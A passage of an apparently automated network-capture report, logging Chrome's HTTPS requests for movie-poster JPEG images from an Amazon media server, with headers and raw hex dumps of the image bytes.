                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 76 b0 f1 a6 a2 a0 c0 cc 4a 93 02 5a be 7d 8a 85 a5 55 e0 4d 47 98 94 66 56 db 60 71 35 1a 55 b7 94 2a d4 63 77 fb b2 7f 4e 2f a9 a4 d3 ea 8e 1b b7 1c cb 2f db 1b 54 63 6a da 1d 51 9d f3 1a e2 d0 f5 53 34 af f1 32 ff 00 d8 c1 36 c0 39 83 46 ad 5e 65 3a ce c2 1a a7 f2 1a d3 80 95 63 c9 a0 08 44 b1 61 aa 76 a2 d1 16 bc 4f 10 d3 b9 b3 00 98 e9 6e af 67 0a f6 35 9f b7 4a ac 64 0d 85 f5 2b 04 f5 0b 36 e4 07 79 98 61 e9 9f 60 32 a3 b6 a9 61 c9 83 a5 43 98 46 10 4b 3c cd 1d aa 99 c8 bf 73 62 79 c4 b7 88 cf 33 d2 b8 16 62 63 ae a3 53 8f 8a fb 00 e3 3d 3d 4e 9f 9c ec 62 76 c4 35 88 c9 88 47 b9 fe 28 04 3c c1 04 d3 2c b7 91 c6 a7 f6 e9 a3 3f 3e 58 80 25 f7 42 f3 7c ee 4a e0 69 9e ba 8d 47 d0 f6 a3 a6 30 d3 5b 54 64 8d 4c ed 18 f4 34 64 23 db 50 dc c0 4d 43 f4 10 4a
                                                                                                                                                                                          Data Ascii: vJZ}UMGfV`q5U*cwN//TcjQS4269F^e:cDavOng5Jd+6ya`2aCFK<sby3bcS==Nbv5G(<,?>X%B|JiG0[TdL4d#PMCJ
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 57 6d 29 ff 00 91 5e 76 a3 37 ab de 48 20 ea 5a ec b3 ad 79 30 0c 46 19 52 25 a0 9b 06 34 d6 14 62 8d f3 66 da a4 c4 f5 1a 9c 43 ac a8 73 0a 82 bc fd 14 c4 b0 b2 e4 2f 04 88 06 21 e9 66 98 23 1b 08 52 17 79 a6 fe e2 03 f3 bd c8 ad a2 78 cc 6c 6c 5c 56 dc 72 f5 06 94 31 46 d8 71 cf 4b 2d d8 33 01 c8 c8 b8 66 b6 11 5f 19 9a 43 f4 3f 3b c6 6a 68 9e 23 6a 19 d5 54 ab 85 30 5c 90 2a 67 70 cc cc bc 7d 62 8f a8 8f 5e e5 20 3e 8f b6 bb 9b 4d 76 d3 82 5b 03 ab 3e 04 dc 31 92 de a2 ea 60 d4 2d c8 40 3a 0b 47 31 d0 28 02 57 a3 cf 2d ed d2 6c 51 d6 d4 dc 00 80 60 62 16 c0 26 54 7b a1 83 3a 1c ed 44 b1 8f 05 73 88 ce 40 9d fc f9 7b 49 11 6a 2e d8 09 a7 44 f1 88 69 46 fe 85 e5 38 82 e0 44 04 11 31 d0 8c 91 d2 e6 c2 cd 3d 64 02 61 4c 82 25 7a 4d a7 26 30 fa c3 5c 14 92
                                                                                                                                                                                          Data Ascii: Wm)^v7H Zy0FR%4bfCs/!f#Ryxll\Vr1FqK-3f_C?;jh#jT0\*gp}b^ >Mv[>1`-@:G1(W-lQ`b&T{:Ds@{Ij.DiF8D1=daL%zM&0\
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: ef e0 86 59 61 76 d9 ad f8 ba b4 c7 75 aa b6 2d 99 8a 2f a4 5a a4 7d f5 02 ce 16 3f 4a c8 53 ed a7 07 20 96 04 39 56 9c 1c cb f1 c5 76 1d 97 e5 5a 34 76 2d f2 7d 31 72 52 e0 b5 96 c8 5e 42 a1 99 8a 29 b8 a8 fb 44 c5 a1 4d ab 2b 60 47 84 0e 2d b0 b5 8b 12 d2 3c 1c ca 43 d7 cc 25 ba f6 cd ca b0 fb 9b 58 c8 55 8a 9c 56 22 f4 22 da 19 80 2b d5 10 06 ad be ed cc 56 d5 ab 29 1e d3 13 09 2b b1 ec 0e bc 87 83 45 bf a7 67 0b c0 bd 44 79 81 a6 2b 6c cb bf b5 a5 37 0a ec 56 6a ba bd 76 bf 04 cf c3 ef 27 21 5e 31 76 d4 74 e2 c4 7a 53 86 6c 68 71 0b 5a 51 13 f8 dd 65 41 2d 87 66 2d a0 b5 7d 56 8f 20 d7 63 33 39 8f 97 c1 46 9b 3e cf d3 65 b9 f9 6b 0b 7c cc 4b 34 c6 3b 6d c9 8b 4f 26 02 5e df 4d c1 eb c7 bd 0a 8b 2d b2 84 41 c9 6d 54 67 95 e1 23 30 83 18 2a f8 af 19 10
                                                                                                                                                                                          Data Ascii: Yavu-/Z}?JS 9VvZ4v-}1rR^B)DM+`G-<C%XUV""+V)+EgDy+l7Vjv'!^1vtzSlhqZQeA-f-}V c39F>ek|K4;mO&^M-AmTg#0*
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 08 64 e8 f4 78 d7 c4 9e ee 70 f0 64 21 12 ec ff 00 92 b0 f7 04 3c a9 0a dd 84 bf 61 df 4b 92 61 2d c7 36 ca d0 3e 10 fc 98 17 09 93 a9 e8 6f 05 e8 42 26 10 87 39 79 25 23 d5 2a db cf a2 75 4a 49 32 38 d8 40 73 10 e1 0d c8 77 70 b2 a5 46 e2 9f ca f6 27 6f fa 43 22 12 ed a1 8f 04 0c 4c 0d 93 63 1e a8 91 e7 71 d3 76 cd aa 8d 97 f4 49 3b 0b ee 24 73 19 43 43 23 55 a6 25 42 85 89 04 90 69 26 98 a2 69 22 94 91 04 41 14 25 31 40 b7 05 f2 72 b1 2c 5a 42 0f 08 88 12 bc 3b c9 c1 1e e7 44 dd 83 51 e9 39 11 5d d4 f8 b4 f7 8d 18 31 22 f9 f4 41 3c 20 91 0d 0e a1 a0 4f 22 05 19 26 66 29 41 18 20 99 91 6c 15 36 87 21 99 ae 39 3e 4f 05 a5 34 2c 45 15 df e4 4b bf e4 42 9e e7 f1 18 b6 cb e8 5e a5 f7 43 6a b5 a2 eb b7 f8 26 be b8 e6 67 c7 f5 8d a2 34 25 92 dc 9b 7d 0c b4 bc
                                                                                                                                                                                          Data Ascii: dxpd!<aKa-6>oB&9y%#*uJI28@swpF'oC"LcqvI;$sCC#U%Bi&i"A%1@r,ZB;DQ9]1"A< O"&f)A l6!9>O4,EKB^Cj&g4%}
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: ae 16 5c 25 78 33 26 ca 66 e6 95 fe 02 31 c0 a5 87 8e 16 3c 6e c9 ac f4 ed cf 42 82 e1 74 6c c0 6a 55 c6 72 2e 4b f6 63 92 94 cf 91 e4 9c 57 cf e0 5a 82 2d b5 22 fa c6 ad 21 14 41 6d c9 85 b3 f0 35 1b 0a fd e8 b2 4b e4 98 ff 00 20 78 c8 86 04 0c 9c 6c 70 62 da 11 3e c4 6a ce 33 67 36 8e 8c 25 ec 50 22 f6 2b 62 de 47 9a 21 04 86 b5 0e a4 b1 ca 9f 23 1e 5b 3f b3 a0 9d 09 ff 00 0e 22 2b 28 7b 90 53 ee 5c 8b aa dd 2a 37 44 9b 0c 41 97 84 c8 e4 e9 cd 7d 44 71 81 62 82 42 20 94 15 2c 39 9b 28 57 e4 78 ea 3f b0 8b 2b 72 a9 33 22 ee 5f c0 ad 1b 98 de 06 59 a8 cc 8a 3c 8c 25 b1 a4 22 06 2e 36 da 34 97 51 96 c2 cb 6e 12 f2 26 93 1f f5 6f 03 bf 1a e4 e1 8b 8e 2f e3 47 90 47 77 97 de d2 fb 97 4d 0b d9 47 6a 69 db 71 b3 02 25 b5 c7 66 2c a4 af ec 29 4f f6 44 82 1b a3
                                                                                                                                                                                          Data Ascii: \%x3&f1<nBtljUr.KcWZ-"!Am5K xlpb>j3g6%P"+bG!#[?"+({S\*7DA}DqbB ,9(Wx?+r3"_Y<%".64Qn&o/GGwMGjiq%f,)OD
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: d8 cd 5b 39 14 d7 3f 7d 57 37 fb 02 8a 33 ad c8 f0 91 ea 42 44 c6 e3 96 cc 9e c3 01 46 79 8f d2 fa 26 05 22 92 f4 60 94 b7 57 78 7f 71 ac 9f d4 91 7b 9b e4 73 0e 3f 05 ee e8 7b 18 2e b3 9e 4b e8 6d 03 df 48 d8 53 fd f6 1a e0 9f 2f 3f 81 d2 a7 76 2f 22 d2 ba 8c f4 20 d3 45 88 43 e1 e0 53 4f a4 72 1a 2b ff 00 aa 95 03 c8 43 93 10 13 c5 ac be 47 85 f7 2d 26 c3 b8 22 53 8d 2c 97 06 06 bc 8b 28 1d 11 c9 cc 49 27 e8 cc 88 10 bd b4 cc df 61 ea e4 39 64 44 6e 4b f2 36 87 bb 1b d7 03 3a 11 ff 00 23 63 a7 a1 21 51 e6 9c 7b 99 76 7b 37 1e c9 1c 8d ae 23 2f 77 fc 22 5c b1 d8 7e 89 8b 02 b9 5b 37 68 8a b7 2c 69 ca 46 d2 66 b8 c8 c5 3b fb b9 ec 32 67 27 58 b3 23 63 fc 9e 85 21 b4 9c 3f 1f a3 60 67 2f 76 27 20 5b 86 f4 b0 d1 5f a6 3d 4b 2c 41 90 36 65 d8 81 55 87 b5 c5
                                                                                                                                                                                          Data Ascii: [9?}W73BDFy&"`Wxq{s?{.KmHS/?v/" ECSOr+CG-&"S,(I'a9dDnK6:#c!Q{v{7#/w"\~[7h,iFf;2g'X#c!?`g/v' [_=K,A6eU


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          62192.168.2.1649792151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:02 UTC413OUTGET /images/M/MV5BMTY4MTkxOTk1Nl5BMl5BanBnXkFtZTgwNjAyODgwMzE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:03 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 28163
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: e4c12762-6d2b-4f12-b385-3bca234bc2da
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 29 Aug 2013 04:31:50 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 18 Nov 2044 11:25:44 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:02 GMT
                                                                                                                                                                                          Age: 1670135
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200047-IAD, cache-ewr-kewr1740053-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 ad 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 00 01 02 03 04 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 00 01 02 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 30 75 e2 2a b0 32 b2 e3 ef 76 f3 3a
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"60u*2v:
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 5e 61 44 ac 16 59 49 26 18 7e 41 9e 8d 6e 0a c6 e5 76 aa aa e5 5f 1b e6 5e f5 5a 96 aa ab 95 7b 5e 49 75 5e 2a da 86 ca 96 dc 30 d4 5f 45 c3 5a 0a 50 a8 cc 9a 62 e2 3c f1 81 35 b0 d0 12 d3 a3 78 ee 63 d4 88 74 35 5d e5 ad 4c 69 dd 83 2e 2b 63 94 62 e7 48 45 3c 4b 27 45 0b ac 46 93 c3 31 35 e6 ba 1c 62 b9 4c 2d 36 9c 45 0f 4b 31 37 a8 0e ba ab db 36 e6 b7 27 00 96 ab e7 c5 da 96 8c 9d 6d 53 73 1d b5 e8 87 ae f7 bb d4 eb 7c a5 3c 79 9b 63 2e ab d6 6d a1 84 a6 f9 c6 a1 3d 72 42 56 22 4a 44 e5 1b 62 a3 9c 66 57 c6 a0 c7 2d 3a a0 3b ac 7a a7 d1 84 b5 31 8d 84 40 da c5 13 71 5c 8a d1 b5 27 c2 54 6c 24 fc b7 47 88 56 2a 44 e7 12 8d 21 42 20 79 f4 c2 d7 86 cd 01 6b 82 db 70 f1 c7 ae ce 73 96 e4 6f 2a cf 9d 42 d7 99 28 be a5 84 ad 64 7b bf 5f 2f b3 0d aa 54 71 ad
                                                                                                                                                                                          Data Ascii: ^aDYI&~Anv_^Z{^Iu^*0_EZPb<5xct5]Li.+cbHE<K'EF15bL-6EK176'mSs|<yc.m=rBV"JDbfW-:;z1@q\'Tl$GV*D!B ykpso*B(d{_/Tq
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 3c 23 a5 6a b5 60 37 be 37 ba cb 0d b9 dc ef e7 2a 84 b2 56 3b 74 ec 15 f6 4b d1 a3 c2 ee 65 5c 41 b0 b6 9c e8 47 42 b8 e3 52 8e 1c b5 16 30 ed 8d 08 32 bc 74 22 c5 1e af 3e 74 24 46 e2 47 97 d2 4a f2 6b d6 3f 27 71 7c 8e b6 ba 9b 58 46 b7 77 18 26 15 95 54 c6 66 88 8b c6 33 24 31 9a 30 86 34 de 47 ce c1 d6 15 9e c9 5a b2 db 57 58 bc 9a 33 86 e2 6c 34 b0 93 25 9d 2d 8f 40 26 43 89 66 66 1a b5 a9 51 b2 d1 74 ae 45 17 5b 09 1a 49 d6 3d 4e 45 91 41 92 fe 6a 10 66 40 bc 49 8e ae a3 2a 13 23 39 33 cb e8 a4 79 3b eb 17 93 bb 9c f6 a7 19 f1 c0 91 b7 56 65 61 b3 1a 9b 64 78 d5 f2 de 58 f8 de ea 6b 55 b6 e1 53 1d 98 6c 93 3b db 2b 96 28 c5 f2 e9 8a 1e 58 b3 d4 0a 1a a2 2c 77 97 65 97 c0 f1 be 11 1c 4c 37 02 06 0a 9a 4b ef 89 33 ab 97 37 c3 55 24 b4 e0 81 a5 e2 64
                                                                                                                                                                                          Data Ascii: <#j`77*V;tKe\AGBR02t">t$FGJk?'q|XFw&Tf3$104GZWX3l4%-@&CffQtE[I=NEAjf@I*#93y;VeadxXkUSl;+(X,weL7K37U$d
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 6d 1e 79 7c 77 89 1d c3 86 b5 f5 06 32 e5 92 29 76 6c 86 6a 92 d7 db d4 17 d5 99 65 2d 3d 6e 8c 8d 1c 8d 20 b1 0e 42 9b 5a 8d d9 10 38 3b b3 c2 fa 18 eb 26 bb 4b 6c 43 33 4c da 5e f6 24 d6 56 12 07 63 ca 04 20 62 d0 ac 27 f6 19 67 df e6 89 60 3d 84 35 60 df b9 b8 85 fd 22 5a 47 e1 83 ab 73 a7 e0 cb a5 9d f7 23 75 c3 3f 84 bc 9d 52 9b 69 ed 56 69 c7 65 b4 92 6c 3c f5 75 28 2a 5a ea 93 46 4a 78 9a 50 20 7a 7b ab 5a 11 75 00 ca 32 cb aa c9 50 e9 c8 16 63 d5 65 ac 15 6e 94 83 5a c8 d8 06 30 b5 5c 6c 03 81 34 a1 1b 30 96 72 70 38 c3 6e 16 fe c7 e8 95 ab f1 d6 6f 9a e5 af 12 6e 7c b1 d9 71 71 60 97 c5 c4 de ab 25 96 69 7e 94 79 5b d1 3c 45 1b 72 c3 98 84 fa 96 6a 61 90 c3 6e 2a ec 50 c1 b4 a8 4e 21 65 8c f3 56 82 7e 9e c8 af 57 e9 88 96 42 40 7a 86 e1 9b f5 f0
                                                                                                                                                                                          Data Ascii: my|w2)vlje-=n BZ8;&KlC3L^$Vc b'g`=5`"ZGs#u?RiViel<u(*ZFJxP z{Zu2PcenZ0\l40rp8non|qq`%i~y[<Erjan*PN!eV~WB@z
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: e8 bb 2b 33 ed 67 44 5b be d5 1b 03 5e 51 32 7c fc db f5 68 f3 30 8c f2 48 9b 27 5a 29 80 e2 7c 95 6e ac 66 3f e4 12 75 53 65 a2 67 b2 83 26 fe 18 e0 2f 25 39 9a 19 63 32 9b 21 46 67 72 2a 79 1a e7 03 43 63 29 92 19 8e 3e 8c 39 ba f2 ed 79 df 32 31 db 39 04 6f 63 e2 2e a8 c9 6c 2d d9 df 34 56 22 8e 38 86 0c ac e2 f5 e0 8d 70 cf b7 2f 22 e4 44 ae c9 fa fb b8 c1 d4 2c a8 22 6f 0b a1 31 9f 89 f0 e8 29 c3 24 00 28 05 9a e4 ca 2f a9 64 d1 03 8f 7c 0d 5e ac bb de d3 36 3e db 92 f1 c0 d5 5a c2 a0 71 5e 7b 00 a2 ac 33 d2 38 d8 6b 45 5a 93 9c b9 58 c4 6a d6 76 b9 08 35 18 49 b0 d1 8c 96 05 8b 24 2c 33 c8 c2 b1 ff 00 85 65 93 2f 9c 19 70 cf b5 27 22 fd a9 3d 14 f2 6d 52 16 e7 fb b0 5a 3a ef a8 49 6e 49 35 62 f8 a5 8d bb 13 ce 6e 2c 08 2f ca 06 f2 33 e5 27 73 69 15
                                                                                                                                                                                          Data Ascii: +3gD[^Q2|h0H'Z)|nf?uSeg&/%9c2!Fgr*yCc)>9y219oc.l-4V"8p/"D,"o1)$(/d|^6>Zq^{38kEZXjv5I$,3e/p'"=mRZ:InI5bn,/3'si
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 59 8f f4 75 c3 7e c9 72 2f da 81 d4 8c 9d 4c 7b c9 df 9d 30 df 2c 6c aa 0f ce 65 ca ce 20 27 3d eb e0 71 21 60 ab 1a b9 61 ec 4a 72 3e 2c 74 89 96 45 b5 ae 7e 4a ac ee 63 a0 0f a2 14 e8 5d 12 b6 fb 45 9d 13 fc cf f6 29 7a 84 0b 2b d9 9d 70 df b0 5c 8b f6 85 d1 12 b0 fb 44 bc 98 e3 d9 3c 6e ae df 92 9d a7 70 a7 9d 86 7f 42 19 c1 fb 58 c8 43 03 7c f9 2c a9 dc f4 e5 56 3d 80 2c af 3e 90 4b e4 a1 00 c8 da a8 b6 e8 db 74 f4 46 5b 5b 5e 52 cc 01 de 41 69 81 9d af c3 d1 99 db ec 63 5f f0 65 92 2d 59 70 df b0 5c 8b f7 c8 9d 4f 27 ca 5e 46 7d 3d 56 59 bc 44 30 d9 65 af 3a c1 be 40 64 3f f8 b2 5f d7 93 4e 71 d1 33 16 37 92 b4 b5 be 66 c3 db 39 08 98 e4 83 7c 6e 2a dc 33 ed d6 5a d5 18 89 fa d5 a0 78 bb 5e a4 76 2d 90 05 9a a7 58 b6 1f 9b 12 3a bb 2c 87 fa 2e 1b f6
                                                                                                                                                                                          Data Ascii: Yu~r/L{0,le '=q!`aJr>,tE~Jc]E)z+p\D<npBXC|,V=,>KtF[[^RAic_e-Yp\O'^F}=VYD0e:@d?_Nq37f9|n*3Zx^v-X:,.
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 02 47 b6 a8 0f 52 be f8 f1 6e 27 25 b3 59 7a b1 8c 51 4c d8 72 76 b0 3a 2e 24 6f ae ce b8 63 d8 3e 52 76 24 5d df 94 65 a2 93 d5 fd 39 88 ee 7d 1a ae 3a 3a f1 89 4d 6f 88 1d 9d c6 1b 19 09 ac 7e 7e 7c 10 6b 21 12 9b f3 3d 79 62 6c f8 98 07 5c 90 fa 32 8a df 82 f1 31 28 73 12 b1 43 d4 83 2f b1 a4 68 2d e4 64 9a 19 22 b1 66 c9 4b 0c 30 45 52 fc 31 c0 d0 4d 5a f8 55 7b 05 1c b6 a1 c8 86 b3 e1 07 59 d7 fe 2e 24 f7 23 5c 31 ec 1f 29 7b 12 2e ef ce 50 d9 a3 79 18 9c 5f 56 8a 62 7d 65 93 ec e1 43 48 f5 59 28 ba 76 25 6e 7c 3b 2b b4 a6 0a e0 6e 05 91 0d b2 f2 ab 3f 87 90 64 52 64 ca 4d fb 8f 27 ac b1 cc d5 72 20 0d f5 23 c9 07 87 78 1e e5 b0 9a 18 44 78 7d be a9 3a 75 c4 bd e1 5c 33 ec 1f 29 7b 12 2e ef ca 00 d3 e7 77 7d 7d 7c b3 fc a3 a7 da a7 f4 04 17 10 37 d6
                                                                                                                                                                                          Data Ascii: GRn'%YzQLrv:.$oc>Rv$]e9}::Mo~~|k!=ybl\21(sC/h-d"fK0ER1MZU{Y.$#\1){.Py_Vb}eCHY(v%n|;+n?dRdM'r #xDx}:u\3){.w}}|7
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: a9 7a 96 b5 d5 2e 81 05 9f 91 ea 9a 0f 4b 91 6a 75 71 24 90 c3 07 47 e8 7b cb c3 16 8f 56 e4 81 7e 05 4b 72 22 6a c7 bc 99 e9 bc 87 b4 cb a8 57 68 ca 26 a8 8e 06 0d 07 da 71 3a 74 2a 80 1f 4a 8f cf 75 aa 16 5f c7 14 4c 2c 31 98 34 c2 dd 8f 17 89 a9 59 92 6f 29 9f 4b e6 98 cc 7e 48 42 94 67 59 2b 58 8c e2 55 b0 d2 2c 20 57 b1 e3 7a ea b5 3c d2 17 14 a1 93 cf 0a e6 c7 f3 a6 cd 4f d6 4c 86 2e 3f 76 73 f0 f5 31 83 c1 0e 1b e9 f0 92 84 cf 23 95 5d 2d 8f a0 f9 35 80 4f 17 26 98 55 11 83 0f 9e 28 19 ee 56 9e bc dc 41 1c 52 89 2b cb 2c 57 07 a5 b1 11 a7 6e 39 62 55 48 23 fe 66 6c 8f f3 a6 cd 4f d6 4c 4f b0 61 39 7f a8 1b 93 14 1d ec c7 b8 c3 66 64 3d f1 d3 db 2d 85 ed 6c 92 6b 45 d5 d0 4b b0 20 64 fb 49 90 ce a0 df 9f 9b 04 a6 c2 cb 56 76 12 6e 26 5e 7b 0d c9 a5
                                                                                                                                                                                          Data Ascii: z.Kjuq$G{V~Kr"jWh&q:t*Ju_L,14Yo)K~HBgY+XU, Wz<OL.?vs1#]-5O&U(VAR+,Wn9bUH#flOLOa9fd=-lkEK dIVvn&^{
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 67 50 e0 09 ea 0f 72 2d 20 93 3a 87 69 58 ba 86 3c 10 3e 0b 35 7f c4 7a 59 31 9a 34 86 eb 42 46 d1 04 b9 14 db a5 56 4c 2d 35 1a 75 2b 37 11 89 aa 50 0a 18 e8 1d 70 d7 dc 6b ab e3 88 3c 2a c2 b9 29 e1 ac c5 83 3d 5b 58 ac ff 00 8c b3 68 68 74 6e 02 4f 40 e5 99 21 a4 d6 e5 48 fa 08 e1 0d 95 ab df e0 d9 f9 26 83 48 c8 ec ef a8 d3 e5 c3 02 d8 c4 b7 4e 0b 07 0c fb 57 71 b7 4d d5 1b c5 b6 e2 a2 40 ba bb 2a cb 6e 0a c3 0e 12 fd 8e a7 54 9f 32 19 f7 31 69 bf fc 4c 4e ba 28 a8 41 62 f5 2d 32 ce 2d 30 7d 44 d5 9c 6c 9a 6d 4f 5a 90 4e 00 8e 01 4c 9b bc 52 b5 18 09 a9 d4 da 91 5a ed 41 d8 3d 1d bb c5 52 ed 2b 54 d8 36 69 99 6b 57 98 9e 8d 85 61 c9 f0 db 44 f4 ef 9d 90 e8 ec 52 14 9d 0d a3 98 2a 62 70 3d 1d ab c9 1f 51 35 9d 92 68 fc 40 52 e4 3d fe 2e 0e 7a 67 c4 6d
                                                                                                                                                                                          Data Ascii: gPr- :iX<>5zY14BFVL-5u+7Ppk<*)=[XhhtnO@!H&HNWqM@*nT21iLN(Ab-2-0}DlmOZNLRZA=R+T6ikWaDR*bp=Q5h@R=.zgm
                                                                                                                                                                                          2024-12-15 11:38:03 UTC1378INData Raw: 9b 95 27 15 ee b9 40 10 59 b4 2c 96 ab 30 ba 54 20 74 52 e8 19 2a 21 38 f4 ae 52 e1 f1 c6 a5 f1 91 0a ab d1 df dd 54 b6 64 7d 11 e5 55 ea d7 cd 7f ae 08 cb 35 aa 34 8a f7 fd 14 a3 04 74 52 8d 46 4a be e5 49 a2 81 19 80 a6 d2 79 51 9e 43 30 57 88 7f da b3 de 11 c8 2e ae 14 86 b9 23 1d 82 3d 53 25 a8 54 25 35 08 45 0a d1 4d ba 69 c7 c9 ff 00 fd 05 aa ea e0 18 ac d0 dd 5e 87 64 2e b1 75 27 15 40 b9 8d 38 fd 47 fe 17 65 d5 b0 75 bf c9 64 7e 97 fa 1d 17 aa cc 5c ed cc 85 dd 7b 14 ca f1 17 69 a2 63 57 2c 66 34 4d 1e ca 13 d2 e1 12 53 7e a9 b1 21 e4 2e 5c 6b 32 9b 32 06 68 72 da 0f aa d0 2e a1 7c 0d 65 9a 04 1d 55 2f ca ab c2 45 fc ed fa ec 30 92 73 d1 36 11 bb aa 6a 85 57 25 92 d4 2a c2 4a 38 a2 b4 54 22 6b 4b b4 2b 42 ba 8a 03 12 ee 8e ec 02 9b 41 1f 2b 36 05
                                                                                                                                                                                          Data Ascii: '@Y,0T tR*!8RTd}U54tRFJIyQC0W.#=S%T%5EMi^d.u'@8Geud~\{icW,f4MS~!.\k22hr.|eU/E0s6jW%*J8T"kK+BA+6


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          63192.168.2.1649793151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:03 UTC676OUTGET /images/M/MV5BZWFjNGI2ODgtMTFmNi00NDU5LWIwNjEtZThmNjk0OTNlNWFiXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:04 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 24037
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 77ccdff4-1c7e-429a-bd06-f0d16b39a03c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 16 Oct 2019 18:33:04 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 08 Dec 2044 15:59:21 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 157122
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:04 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100030-IAD, cache-ewr-kewr1740040-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
